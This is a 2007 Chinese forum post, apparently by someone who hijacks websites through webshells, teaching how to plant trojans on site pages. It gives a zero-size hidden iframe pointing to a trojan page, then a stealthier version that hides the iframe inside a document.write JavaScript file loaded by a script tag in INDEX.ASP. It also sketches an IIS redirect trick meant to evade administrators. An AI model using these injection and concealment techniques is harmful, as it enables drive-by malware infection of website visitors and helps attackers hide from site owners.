- 论坛徽章:
- 0
|
|
今天没事找了些WEBSHELL发现有很多都以给别人先占了坐打开INDEX.ASP发现<iframe src=http://XXXXXX/jiaozhu.htm width=0 height=0></iframe>,早被人挂了马儿,不过把他的代马删掉换上我的就可以了,相信大多数人挂马都会用<iframe src=http://XXXXXX/jiaozhu.htm width=0 height=0></iframe>,这样的代码, 不过这样是很容易就被人发现了, 今天我教你一招隐蔽的对初学者是很有用哦注意看下面代码: \r\n\r\n 首先在自己的电脑建个文本文档TXT写入document.write(\"<iframe <iframe src=http://你的木马路经/tzd.htm width=0 height=0></iframe>\");然后将文件另存为一个JS的扩展名这样你的JS文件就生成了然后将你的JS文件上传到空间后那你在INDEX.ASP挂马的代码就可以这用写<script language=javascript src=你的.js></script>或在不一个目录下<script language=javascript src=http://xxxxxxxxx/1.js></script>加在主页代码多的地方是不是看不出什么哦,下面我给大家举个例子,我把我的JS取名问1.JS将他上传到wwww.123.com主页目录下然后我在主页的INDEX.ASP中加入代码为<script language=javascript src=\"/1.js>\";</script>这样就可以了 \r\n我就不做动画教程了大家按我说明一步一步做就可以了只是利用了javascript的JS脚本呵呵 \r\n\r\n服务器挂马 \r\n这里简单说一个比较狠的吧.重定向任何调用的htm,js,等文件,只要是执行的. \r\n\r\n 这种方法在计算中用搜索关键词是搜索不到的,反正本地怎么找也找不到。。谁能想到是在iis里设置的呢?而且调用文件那么多,怎么知道是重定向的那个文件呢?反正现在想不到有什么好方法可以解决,如果服务器如上图被挂马了,偶最好的建议是重装IIS \r\n挂马很多种多动脑筋让马儿更隐藏 |
|
免费注册
发表于 2007-11-05 08:47
